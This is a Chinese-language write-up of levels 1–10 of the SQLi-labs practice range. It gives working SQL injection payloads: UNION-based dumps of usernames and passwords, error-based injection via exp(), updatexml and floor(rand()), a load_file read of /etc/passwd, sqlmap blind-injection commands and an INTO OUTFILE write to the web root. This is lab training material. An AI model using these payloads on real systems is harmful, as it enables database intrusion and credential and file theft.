SQLlabs less1-10通关笔记

SQLlabs 通关笔记

mysql数据结构

在练习靶场前我们需要了解以下mysql数据库结构，mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。了解这些对于我们之后去查询数据有很大帮助。我们前面机关讲解比较详细后面就比较简单了。 这个是我第一次做sql的时候看到那些payload的时候很不懂的一个东西，后来才知道是MySQL里面自带的。

less 1~4

这一题比较常规直接给出payload，只是每个的闭合点或者传参方式有点不一样

//找列数
?id=1' order by 3#
?id=1' order by 4#
//确定哪个字段有回现
?id=0' union select 1,2,3#//令id=0是因为数据库有1这个id，而它的回显位置有限，不会将所有查询的东西返回出来，只能取有的第一行数据
//爆出当前数据库
?id=0' union select 1,2,database()#
//爆出当前数据库的表名
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
//爆出当前表的列名
?id=0' union select 1,2,group_concat(COLUMN_name) from information_schema.COLUMNS where table_name='users'#
//爆出当数据库的user表所有的passwd和username
?id=0' union select 1,group_concat(username),group_concat(password) from users#

less 5、6

这里就没有回显了，但是还是会有报错这个时候可以使用报错注入

报错注入

什么是报错注入

报错注入是通过特殊函数错误使用并使其输出结果来获取信息的。简单点来说，就是在可以进行sql注入的位置，调用特殊的函数执行，利用函数报错使其输出结果来获取数据库的相关信息

使用条件

页面错误信息显示出来

种类

BigInt等数据类型溢出

函数参数格式错误

主键、字段重复

报错函数

BigInt函数数据类型溢出报错注入

mysql数据库版本为：?id=1' and exp(~(select * from (select user())a))--+

exp(int)函数利用是BigInt数据类型溢出

作用：返回e的x次方，当x的值足够大的时候就会导致函数的结果数据类型溢出

利用方式：当涉及到注入时，我们使用否定查询来造成“DOUBLE value is out of range”，因为函数成功执行时，会返回0，那么我们先将0按位取反，在获取e的那个数的次方，就会造成BigInt数据类型溢出，就会报错

payload:?id=1' and exp(~(select * from (select user())a))#
语意：先查询select user()这个语句的结果，然后将查询出来的数据作为一个结果集取名为a，再查询a，将结果a全部查出来

and exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a))#表名
and exp(~(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)a))#列名
and exp(~(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)a))#列名里面的信息
and exp(~(select * from (select load_file('/etc/passwd'))a))#读取文件

注意：对于所有的insert、update和delete语句DIOS查询也同样可以使用 除了exp()函数之外，pow()之类的相似函数同样可以利用BigInt数据溢出的方式进行报错注入

参数格式错误进行报错注入

updataxml函数利用的就是mysql函数参数格式错误进行报错注入

语法：updataxml(XML_document,Xpath_string,new_value);

语法解析：

XML_document:是字符串String格式，为XML文档对象名称

Xpath_string:Xpath格式的字符串

new_value:string格式，替换查找到的符合条件的数据

适用版本：5.1.5+

利用方式：在执行两个函数时，如果出现xml文件路径错误，就会产生报错，那么我们就需要构造Xpath_tring格式错误，就是我们将Xpath_string的值传递成不符合格式的参数，mysql就会报错

payload：
?id=1' and updatexml(1,concat(0x7e,user(),0x7e,version(),0x7e),3)--+#查询当前数据库用户信息以及数据库版本信息
?id=1' and updatexml(1,concat(0x7e,database(),0x7e,@@version_compile_os,0x7e),3)--+#查询当前数据库名称和操作系统版本信息
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),3)--+#获取当前数据库下数据表的信息

注意：在使用updatexml()函数造成xpath格式不符报错注入的时候，需要注意： updatexml最多只能显示32位，需要配合SUBSTR使用

主键重复

这种方式可以实现报错的原因：虚拟表的主键重复

首先，主键重复方式的报错注入利用的函数有：floor() + rand() + group() + count()

floor()函数的作用就是返回小于等于该值的最大整数，即向下取整，只保留整数部分；count()函数是一个计数函数 group by 语句与count()函数结合，根据一个或多个列对结果集进行分组；rand()函数用来随机生成0或1，在sql报错注入中，我们使用rand(0)获取有规律可循的0或1随机数字(rand()生成的数字是完全随机的)

原理：在使用group by进行分组查询的时候，数据库会生成一张虚拟表，并使用group by还要进行两次运算，第一次运算是先获取group by后面的值，然后拿group by后面的值去和虚拟表中的值比较；第二次是对比虚拟表中的值如果group by后面的值在虚拟表中不存在，那么就将group by后面的值插入到虚拟表中，当插入虚拟表中时，进行运算。那么，rand()函数存在一定的随机性，所以group by后面的值两次计算结果可能不一致，但是这个运算的结果可能在虚拟表中已经存在了，那么这时候吧值插入到虚拟表中就会导致主键重复，进而引发错误！！来实现我们想要的效果

payload：
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

less 7-10

盲注

延时盲注

sqlmap -u "http://127.0.0.1:8888/Less-7/?id=1" --dbms=MySQL --random-agent --flush-session --technique=T -v 3

布尔盲注

sqlmap -u "http://127.0.0.1:8888/Less-7/?id=1" --dbms=MySQL --random-agent --flush-session --technique=B -v 3

导出数据到文件

使用 outfile 导出到文件来查询数据，默认 outfile 是没有开启的，得手动开启一下

# mysql -e "show global variables like '%secure%';"
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+

• ure_file_priv 的值为 null ，表示限制 mysqld 不允许导入 | 导出
• 当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入 | 导出只能发生在 /tmp/ 目录下
• 当 secure_file_priv 的值为 空 时，表示不对 mysqld 的导入 | 导出做限制

payload:/?id=1')) union select * from security.users into outfile "D://phpstudy_pro/WWW/sqllabs/Less-7/1.txt"#